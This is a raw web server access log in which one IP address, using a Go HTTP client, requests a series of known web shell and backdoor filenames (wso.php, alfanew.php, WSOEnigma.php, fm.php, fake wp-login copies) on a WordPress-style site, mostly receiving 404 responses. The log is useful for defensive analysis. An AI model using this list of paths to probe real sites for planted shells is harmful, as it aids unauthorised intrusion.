139.99.68.31 - - [30/Mar/2025:12:53:11 -0400] "GET /shell.php HTTP/1.1" 404 8271 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:11 -0400] "GET /wp-includes/ID3/wp-login.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:12 -0400] "GET /jetpack.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:13 -0400] "GET /alfanew.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:14 -0400] "GET /wso.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:15 -0400] "GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.1" 404 8273 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:15 -0400] "GET /wp-content/ HTTP/1.1" 200 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:15 -0400] "GET /classwithtostring.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:16 -0400] "GET /wp-admin/user/about.php?p= HTTP/1.1" 302 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:17 -0400] "GET /wp-admin/js/about.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:17 -0400] "GET /wp-header.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
43.166.250.187 - - [30/Mar/2025:12:53:18 -0400] "GET / HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
139.99.68.31 - - [30/Mar/2025:12:53:18 -0400] "GET /wp-content/plugins/hello.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:18 -0400] "GET /wp-content/themes/about.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:19 -0400] "GET /WSOEnigma.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:19 -0400] "GET /wp-includes/wso112233.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:20 -0400] "GET /.well-known/ HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:21 -0400] "GET /1.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:21 -0400] "GET /wp-content/index.php HTTP/1.1" 200 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:22 -0400] "GET /s.php HTTP/1.1" 404 8271 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:22 -0400] "GET /wp-includes/wp-login.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:23 -0400] "GET /wp-l0gin.php HTTP/1.1" 404 8272 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:24 -0400] "GET /fm.php?p= HTTP/1.1" 301 0 "-" "Go-http-client/1.1"
139.99.68.31 - - [30/Mar/2025:12:53:24 -0400] "GET /fm.php HTTP/1.1" 404 8272 "http://inversionesgoldie.com/fm.php?p=" "Go-http-client/1.1"
